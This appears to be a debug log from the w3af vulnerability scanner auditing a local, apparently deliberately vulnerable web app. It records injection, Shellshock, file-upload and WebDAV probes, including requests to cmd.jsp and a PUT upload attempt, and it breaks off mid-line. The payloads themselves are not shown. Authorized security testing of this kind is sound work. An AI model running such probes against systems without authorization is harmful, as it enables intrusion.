xxe.audit(did="vHuRLcWQ", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:10 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:10 2020 - debug] GET http://localhost:9090/cmd.jsp returned HTTP code "404" (id=797,from_cache=0,grep=1,rtt=0.06,did=4fYp28eE) [Wed Feb 12 09:37:10 2020 - debug] open_api.discover(did="4fYp28eE",uri="http://localhost:9090/cmd.jsp") took 0.48s to run (0.06s 12% sending HTTP requests) [Wed Feb 12 09:37:10 2020 - debug] wordpress_fingerprint.discover(http://localhost:9090/cmd.jspx, did=HbwWiHlT) [Wed Feb 12 09:37:10 2020 - debug] [wordpress_fingerprint] Crawling "http://localhost:9090/cmd.jspx" [Wed Feb 12 09:37:10 2020 - debug] eval.audit(did="1iqRULLr", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:10 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:10 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:1iqRULLr) [Wed Feb 12 09:37:10 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:10 2020 - debug] eval.audit(did="1iqRULLr",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.01s to run [Wed Feb 12 09:37:10 2020 - debug] xxe.audit(did="vHuRLcWQ",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.09s to run [Wed Feb 12 09:37:10 2020 - debug] rosetta_flash.audit(did="abGwR1tN", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:10 2020 - debug] rosetta_flash.audit(did="abGwR1tN",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.00s to run [Wed Feb 12 09:37:10 2020 - debug] xss.audit(did="PfpgRz6E", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:10 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:10 2020 - debug] xss.audit(did="PfpgRz6E",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.00s to run [Wed Feb 12 09:37:11 2020 - debug] xst.audit(did="mdlWdrRR", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:11 2020 - debug] xst.audit(did="mdlWdrRR",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.00s to run [Wed Feb 12 09:37:11 2020 - debug] GET http://localhost:9090/assets/jquery-3.2.1.min.js returned HTTP code "200" (id=798,from_cache=0,grep=1,rtt=0.04,did=atzzIWXv) [Wed Feb 12 09:37:11 2020 - debug] GET http://localhost:9090/assets/jquery-3.2.1.min.js returned HTTP code "200" (id=803,from_cache=0,grep=1,rtt=0.31,did=rTzwDTRC) [Wed Feb 12 09:37:11 2020 - debug] htaccess_methods.audit(did="G79FGirz",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.58s to run [Wed Feb 12 09:37:11 2020 - debug] ssl_certificate.audit(did="9u317LVi", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:11 2020 - debug] GET http://localhost:9090/assets/jquery-3.2.1.min.js returned HTTP code "200" (id=799,from_cache=0,grep=0,rtt=0.14,did=Nxo90dQW) [Wed Feb 12 09:37:11 2020 - debug] GET http://localhost:9090/cmd.jspx returned HTTP code "404" (id=801,from_cache=1,grep=1,rtt=0.46,did=sUMGlPDO) [Wed Feb 12 09:37:11 2020 - debug] SEARCH http://localhost:9090/assets/ with data: " Select \'D..." returned HTTP code "404" (id=800,from_cache=0,grep=1,rtt=0.11,did=EBRJWgG7) [Wed Feb 12 09:37:11 2020 - debug] preg_replace.audit(did="HbcFqYuU", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:11 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:12 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:HbcFqYuU) [Wed Feb 12 09:37:12 2020 - debug] mx_injection.audit(did="E2R50nCh", uri="http://localhost:9090/assets/jquery-3.2.1.min.js") [Wed Feb 12 09:37:12 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/jquery-3.2.1.min.js" () [Wed Feb 12 09:37:12 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:E2R50nCh) [Wed Feb 12 09:37:12 2020 - debug] ssl_certificate.audit(did="9u317LVi",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 0.00s to run [Wed Feb 12 09:37:12 2020 - debug] server_header.discover(did="gqyjyzYM",uri="http://localhost:9090/cmd.jspx") took 0.95s to run [Wed Feb 12 09:37:12 2020 - debug] PUT http://localhost:9090/assets/OKeAh with data: "pqKooK" returned HTTP code "404" (id=804,from_cache=0,grep=1,rtt=0.29,did=TecGVCGv) [Wed Feb 12 09:37:12 2020 - debug] PROPFIND http://localhost:9090/assets/ with data: " , response wait time was: 0.0327348709106 seconds and response ID: 814. [Wed Feb 12 09:37:15 2020 - debug] sqli.audit(did="iweMWM06", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:15 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js" () [Wed Feb 12 09:37:15 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:iweMWM06) [Wed Feb 12 09:37:15 2020 - debug] blind_sqli.audit(did="OWKG6v1q", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:15 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js" () [Wed Feb 12 09:37:15 2020 - debug] GET http://localhost:9090/assets/jquery-3.2.1.min.js returned HTTP code "200" (id=815,from_cache=0,grep=1,rtt=0.09,did=Nxo90dQW) [Wed Feb 12 09:37:15 2020 - debug] [id: 140100577100240] HTTP response delay was 0.09. (lower, expected, upper): 8.00, 8.00, 16.14. [Wed Feb 12 09:37:15 2020 - debug] [did: Nxo90dQW] [id: 140100577100240] Failed to control HTTP response delay for URL http://localhost:9090/assets/jquery-3.2.1.min.js - parameter "User-Agent" for 8 seconds using , response wait time was: 0.0862109661102 seconds and response ID: 815. [Wed Feb 12 09:37:15 2020 - debug] shell_shock.audit(did="Nxo90dQW",uri="http://localhost:9090/assets/jquery-3.2.1.min.js") took 2.10s to run (0.51s 24% sending HTTP requests) [Wed Feb 12 09:37:15 2020 - debug] sqli.audit(did="iweMWM06",uri="http://localhost:9090/assets/showdown.min.js") took 0.02s to run [Wed Feb 12 09:37:15 2020 - debug] phishing_vector.audit(did="hBXyN0ee", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:15 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js" () [Wed Feb 12 09:37:15 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:hBXyN0ee) [Wed Feb 12 09:37:15 2020 - debug] Finished audit.phishing_vector (did=hBXyN0ee) [Wed Feb 12 09:37:15 2020 - debug] phishing_vector.audit(did="hBXyN0ee",uri="http://localhost:9090/assets/showdown.min.js") took 0.00s to run [Wed Feb 12 09:37:15 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js" () [Wed Feb 12 09:37:15 2020 - debug] blind_sqli.audit(did="OWKG6v1q",uri="http://localhost:9090/assets/showdown.min.js") took 0.02s to run [Wed Feb 12 09:37:15 2020 - debug] generic.audit(did="uruDq12g", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:15 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js" () [Wed Feb 12 09:37:15 2020 - debug] generic.audit(did="uruDq12g",uri="http://localhost:9090/assets/showdown.min.js") took 0.00s to run [Wed Feb 12 09:37:15 2020 - debug] format_string.audit(did="khkxUTgb", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:15 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js" () [Wed Feb 12 09:37:15 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:khkxUTgb) [Wed Feb 12 09:37:15 2020 - debug] format_string.audit(did="khkxUTgb",uri="http://localhost:9090/assets/showdown.min.js") took 0.00s to run [Wed Feb 12 09:37:15 2020 - debug] websocket_hijacking.audit(did="95UDJQS2", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:15 2020 - debug] websocket_hijacking.audit(did="95UDJQS2",uri="http://localhost:9090/assets/showdown.min.js") took 0.00s to run [Wed Feb 12 09:37:15 2020 - debug] shell_shock.audit(did="APluGi22", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:15 2020 - debug] memcachei.audit(did="CXXMN8rK", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:15 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js" () [Wed Feb 12 09:37:15 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:CXXMN8rK) [Wed Feb 12 09:37:15 2020 - debug] memcachei.audit(did="CXXMN8rK",uri="http://localhost:9090/assets/showdown.min.js") took 0.00s to run [Wed Feb 12 09:37:15 2020 - debug] localhost:9090 connection pool stats (free:53 / in_use:0 / max:50 / total:53) [Wed Feb 12 09:37:15 2020 - debug] There are no connections marked as in use in the connection pool at this time [Wed Feb 12 09:37:15 2020 - debug] un_ssl.audit(did="Zldyzc3B", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:15 2020 - debug] un_ssl.audit(did="Zldyzc3B",uri="http://localhost:9090/assets/showdown.min.js") took 0.00s to run [Wed Feb 12 09:37:15 2020 - debug] ldapi.audit(did="8J8rAR0T", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:15 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js" () [Wed Feb 12 09:37:15 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:8J8rAR0T) [Wed Feb 12 09:37:15 2020 - debug] ldapi.audit(did="8J8rAR0T",uri="http://localhost:9090/assets/showdown.min.js") took 0.00s to run [Wed Feb 12 09:37:15 2020 - debug] buffer_overflow.audit(did="UuSwQHeU", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:15 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js" () [Wed Feb 12 09:37:15 2020 - debug] buffer_overflow.audit(did="UuSwQHeU",uri="http://localhost:9090/assets/showdown.min.js") took 0.00s to run [Wed Feb 12 09:37:15 2020 - debug] redos.audit(did="5VDcaRVZ", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:15 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js" () [Wed Feb 12 09:37:15 2020 - debug] redos.audit(did="5VDcaRVZ",uri="http://localhost:9090/assets/showdown.min.js") took 0.00s to run [Wed Feb 12 09:37:15 2020 - debug] global_redirect.audit(did="ZBDOsbBy", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:15 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js" () [Wed Feb 12 09:37:15 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:ZBDOsbBy) [Wed Feb 12 09:37:16 2020 - debug] GET http://localhost:9090/assets/showdown.min.js returned HTTP code "200" (id=817,from_cache=0,grep=1,rtt=0.00,did=APluGi22) [Wed Feb 12 09:37:16 2020 - debug] xpath.audit(did="DDOuqWOZ", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:16 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js" () [Wed Feb 12 09:37:16 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:DDOuqWOZ) [Wed Feb 12 09:37:16 2020 - debug] cors_origin.audit(did="PQ5i1y80", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:16 2020 - debug] htaccess_methods.audit(did="UZ091tKC", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:16 2020 - debug] dav.audit(did="MA6bwHB4", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:16 2020 - debug] ssi.audit(did="B8n7nI3n", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:16 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 93. [Wed Feb 12 09:37:16 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=221 returned HTTP code "200" (id=816,from_cache=0,grep=0,rtt=0.64,did=hDpq8sw2) [Wed Feb 12 09:37:16 2020 - debug] dav.audit(did="MA6bwHB4",uri="http://localhost:9090/assets/showdown.min.js") took 0.00s to run [Wed Feb 12 09:37:16 2020 - debug] xxe.audit(did="Ktk0E8ho", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:16 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js" () [Wed Feb 12 09:37:16 2020 - debug] xpath.audit(did="DDOuqWOZ",uri="http://localhost:9090/assets/showdown.min.js") took 0.04s to run [Wed Feb 12 09:37:16 2020 - debug] GET http://localhost:9090/assets/showdown.min.js returned HTTP code "200" (id=818,from_cache=0,grep=1,rtt=0.04,did=PQ5i1y80) [Wed Feb 12 09:37:16 2020 - debug] xxe.audit(did="Ktk0E8ho",uri="http://localhost:9090/assets/showdown.min.js") took 0.05s to run [Wed Feb 12 09:37:16 2020 - debug] eval.audit(did="qWIkPfvn", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:16 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js" () [Wed Feb 12 09:37:16 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:qWIkPfvn) [Wed Feb 12 09:37:16 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js" () [Wed Feb 12 09:37:16 2020 - debug] rosetta_flash.audit(did="DUgmJfqJ", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:16 2020 - debug] rosetta_flash.audit(did="DUgmJfqJ",uri="http://localhost:9090/assets/showdown.min.js") took 0.00s to run [Wed Feb 12 09:37:16 2020 - debug] GET http://localhost:9090/assets/showdown.min.js returned HTTP code "200" (id=820,from_cache=0,grep=1,rtt=0.04,did=uJgaBFqD) [Wed Feb 12 09:37:16 2020 - debug] xss.audit(did="3RkSSuwi", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:16 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js" () [Wed Feb 12 09:37:16 2020 - debug] xss.audit(did="3RkSSuwi",uri="http://localhost:9090/assets/showdown.min.js") took 0.00s to run [Wed Feb 12 09:37:16 2020 - debug] eval.audit(did="qWIkPfvn",uri="http://localhost:9090/assets/showdown.min.js") took 0.01s to run [Wed Feb 12 09:37:16 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js" () [Wed Feb 12 09:37:16 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:B8n7nI3n) [Wed Feb 12 09:37:16 2020 - debug] htaccess_methods.audit(did="UZ091tKC",uri="http://localhost:9090/assets/showdown.min.js") took 0.18s to run [Wed Feb 12 09:37:16 2020 - debug] GET http://localhost:9090/assets/showdown.min.js returned HTTP code "200" (id=819,from_cache=0,grep=0,rtt=0.04,did=APluGi22) [Wed Feb 12 09:37:16 2020 - debug] ssi.audit(did="B8n7nI3n",uri="http://localhost:9090/assets/showdown.min.js") took 0.17s to run [Wed Feb 12 09:37:16 2020 - debug] xst.audit(did="fag3ecXQ", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:16 2020 - debug] xst.audit(did="fag3ecXQ",uri="http://localhost:9090/assets/showdown.min.js") took 0.00s to run [Wed Feb 12 09:37:16 2020 - debug] ssl_certificate.audit(did="wcxVCN36", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:16 2020 - debug] ssl_certificate.audit(did="wcxVCN36",uri="http://localhost:9090/assets/showdown.min.js") took 0.00s to run [Wed Feb 12 09:37:16 2020 - debug] preg_replace.audit(did="XphTGZj7", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:16 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js" () [Wed Feb 12 09:37:16 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:XphTGZj7) [Wed Feb 12 09:37:16 2020 - debug] mx_injection.audit(did="gvFI85bC", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:16 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js" () [Wed Feb 12 09:37:16 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:gvFI85bC) [Wed Feb 12 09:37:16 2020 - debug] mx_injection.audit(did="gvFI85bC",uri="http://localhost:9090/assets/showdown.min.js") took 0.00s to run [Wed Feb 12 09:37:16 2020 - debug] preg_replace.audit(did="XphTGZj7",uri="http://localhost:9090/assets/showdown.min.js") took 0.00s to run [Wed Feb 12 09:37:17 2020 - debug] GET http://localhost:9090/assets/showdown.min.js returned HTTP code "200" (id=821,from_cache=0,grep=1,rtt=0.04,did=PQ5i1y80) [Wed Feb 12 09:37:17 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 397, 'reject-seen-url': 140, 'reject-out-of-scope': 9, 'accept': 129} [Wed Feb 12 09:37:17 2020 - debug] cors_origin.audit(did="PQ5i1y80",uri="http://localhost:9090/assets/showdown.min.js") took 0.28s to run (0.08s 30% sending HTTP requests) [Wed Feb 12 09:37:17 2020 - debug] response_splitting.audit(did="p7Y72JDx", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:17 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js" () [Wed Feb 12 09:37:17 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:p7Y72JDx) [Wed Feb 12 09:37:17 2020 - debug] response_splitting.audit(did="p7Y72JDx",uri="http://localhost:9090/assets/showdown.min.js") took 0.03s to run [Wed Feb 12 09:37:17 2020 - debug] global_redirect.audit(did="ZBDOsbBy",uri="http://localhost:9090/assets/showdown.min.js") took 0.40s to run [Wed Feb 12 09:37:17 2020 - debug] rfd.audit(did="phQLOuCM", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:17 2020 - debug] rfi.audit(did="M55wo6Th", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:17 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js" () [Wed Feb 12 09:37:17 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:M55wo6Th) [Wed Feb 12 09:37:17 2020 - debug] GET http://localhost:9090/assets/showdown.min.js returned HTTP code "200" (id=822,from_cache=0,grep=0,rtt=0.04,did=APluGi22) [Wed Feb 12 09:37:17 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js%3B/w3af.cmd%3B/w3af.cmd" () [Wed Feb 12 09:37:17 2020 - debug] rfd.audit(did="phQLOuCM",uri="http://localhost:9090/assets/showdown.min.js") took 0.04s to run [Wed Feb 12 09:37:17 2020 - debug] RFI using local web server for URL: http://localhost:9090/assets/showdown.min.js [Wed Feb 12 09:37:17 2020 - debug] frontpage.audit(did="HY1I447j", uri="http://localhost:9090/assets/showdown.min.js") [Wed Feb 12 09:37:17 2020 - debug] frontpage.audit(did="HY1I447j",uri="http://localhost:9090/assets/showdown.min.js") took 0.01s to run [Wed Feb 12 09:37:17 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/assets/showdown.min.js" () [Wed Feb 12 09:37:17 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:M55wo6Th) [Wed Feb 12 09:37:17 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=823,from_cache=0,grep=0,rtt=0.03,did=hQie6hnm) [Wed Feb 12 09:37:17 2020 - debug] rfi.audit(did="M55wo6Th",uri="http://localhost:9090/assets/showdown.min.js") took 0.21s to run [Wed Feb 12 09:37:17 2020 - debug] GET http://localhost:9090/assets/showdown.min.js returned HTTP code "200" (id=824,from_cache=0,grep=0,rtt=0.05,did=APluGi22) [Wed Feb 12 09:37:17 2020 - debug] Returning cached average RTT of 0.04 seconds for mutant 2462d839018f4e3bb4d09404533da62e [Wed Feb 12 09:37:17 2020 - debug] Increased the worker pool size to 32 (error rate: 0%) [Wed Feb 12 09:37:17 2020 - debug] file_upload.audit(did="0ZV1ZCKO", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:17 2020 - debug] file_upload.audit(did="0ZV1ZCKO",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.00s to run [Wed Feb 12 09:37:17 2020 - debug] Returning fresh average RTT of 0.04 seconds for mutant 2462d839018f4e3bb4d09404533da62e [Wed Feb 12 09:37:17 2020 - debug] csrf.audit(did="DkJxomcp", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:17 2020 - debug] csrf.audit(did="DkJxomcp",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.02s to run [Wed Feb 12 09:37:17 2020 - debug] deserialization.audit(did="Yl6YPEus", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:17 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:17 2020 - debug] deserialization.audit(did="Yl6YPEus",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.00s to run [Wed Feb 12 09:37:17 2020 - debug] os_commanding.audit(did="tfpQbu3l", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:17 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:17 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:17 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:tfpQbu3l) [Wed Feb 12 09:37:17 2020 - debug] lfi.audit(did="vfa57BT2", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:17 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:17 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:vfa57BT2) [Wed Feb 12 09:37:17 2020 - debug] lfi.audit(did="vfa57BT2",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.00s to run [Wed Feb 12 09:37:17 2020 - debug] GET http://localhost:9090/assets/showdown.min.js returned HTTP code "200" (id=826,from_cache=0,grep=1,rtt=0.05,did=APluGi22) [Wed Feb 12 09:37:17 2020 - debug] [id: 140100568858576] HTTP response delay was 0.05. (lower, expected, upper): 8.00, 8.00, 16.06. [Wed Feb 12 09:37:17 2020 - debug] [did: APluGi22] [id: 140100568858576] Failed to control HTTP response delay for URL http://localhost:9090/assets/showdown.min.js - parameter "User-Agent" for 8 seconds using , response wait time was: 0.0539979934692 seconds and response ID: 826. [Wed Feb 12 09:37:17 2020 - debug] GET http://localhost:9090/assets/showdown.min.js returned HTTP code "200" (id=825,from_cache=0,grep=1,rtt=0.04,did=APluGi22) [Wed Feb 12 09:37:17 2020 - debug] [id: 140100570332688] HTTP response delay was 0.04. (lower, expected, upper): 8.00, 8.00, 16.06. [Wed Feb 12 09:37:17 2020 - debug] [did: APluGi22] [id: 140100570332688] Failed to control HTTP response delay for URL http://localhost:9090/assets/showdown.min.js - parameter "User-Agent" for 8 seconds using , response wait time was: 0.0365121364594 seconds and response ID: 825. [Wed Feb 12 09:37:18 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:18 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:18 2020 - debug] shell_shock.audit(did="APluGi22",uri="http://localhost:9090/assets/showdown.min.js") took 0.95s to run (0.23s 23% sending HTTP requests) [Wed Feb 12 09:37:18 2020 - debug] sqli.audit(did="sRwherUq", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:18 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:18 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:sRwherUq) [Wed Feb 12 09:37:18 2020 - debug] os_commanding.audit(did="tfpQbu3l",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.06s to run [Wed Feb 12 09:37:18 2020 - debug] sqli.audit(did="sRwherUq",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.02s to run [Wed Feb 12 09:37:18 2020 - debug] blind_sqli.audit(did="EGL5gOV6", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:18 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:18 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:18 2020 - debug] phishing_vector.audit(did="xCnCG3XH", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:18 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:18 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:xCnCG3XH) [Wed Feb 12 09:37:18 2020 - debug] generic.audit(did="mjtnkcbT", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:18 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:18 2020 - debug] generic.audit(did="mjtnkcbT",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.00s to run [Wed Feb 12 09:37:18 2020 - debug] blind_sqli.audit(did="EGL5gOV6",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.03s to run [Wed Feb 12 09:37:18 2020 - debug] Finished audit.phishing_vector (did=xCnCG3XH) [Wed Feb 12 09:37:18 2020 - debug] phishing_vector.audit(did="xCnCG3XH",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.01s to run [Wed Feb 12 09:37:18 2020 - debug] format_string.audit(did="CZAC1EQ0", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:18 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:18 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:CZAC1EQ0) [Wed Feb 12 09:37:18 2020 - debug] websocket_hijacking.audit(did="pIKV1pKA", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:18 2020 - debug] format_string.audit(did="CZAC1EQ0",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.02s to run [Wed Feb 12 09:37:18 2020 - debug] shell_shock.audit(did="y8xtzSWj", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:18 2020 - debug] websocket_hijacking.audit(did="pIKV1pKA",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.02s to run [Wed Feb 12 09:37:18 2020 - debug] memcachei.audit(did="IUnxYnzC", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:18 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:18 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:IUnxYnzC) [Wed Feb 12 09:37:18 2020 - debug] un_ssl.audit(did="QKis5oEA", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:18 2020 - debug] un_ssl.audit(did="QKis5oEA",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.00s to run [Wed Feb 12 09:37:18 2020 - debug] memcachei.audit(did="IUnxYnzC",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.01s to run [Wed Feb 12 09:37:18 2020 - debug] ldapi.audit(did="ZccGTv8T", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:18 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:18 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:ZccGTv8T) [Wed Feb 12 09:37:18 2020 - debug] ldapi.audit(did="ZccGTv8T",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.01s to run [Wed Feb 12 09:37:18 2020 - debug] buffer_overflow.audit(did="033AIVB7", uri="http://localhost:9090/learn/vulnerability/a1_injection") [Wed Feb 12 09:37:18 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" () [Wed Feb 12 09:37:18 2020 - debug] buffer_overflow.audit(did="033AIVB7",uri="http://localhost:9090/learn/vulnerability/a1_injection") took 0.01s to 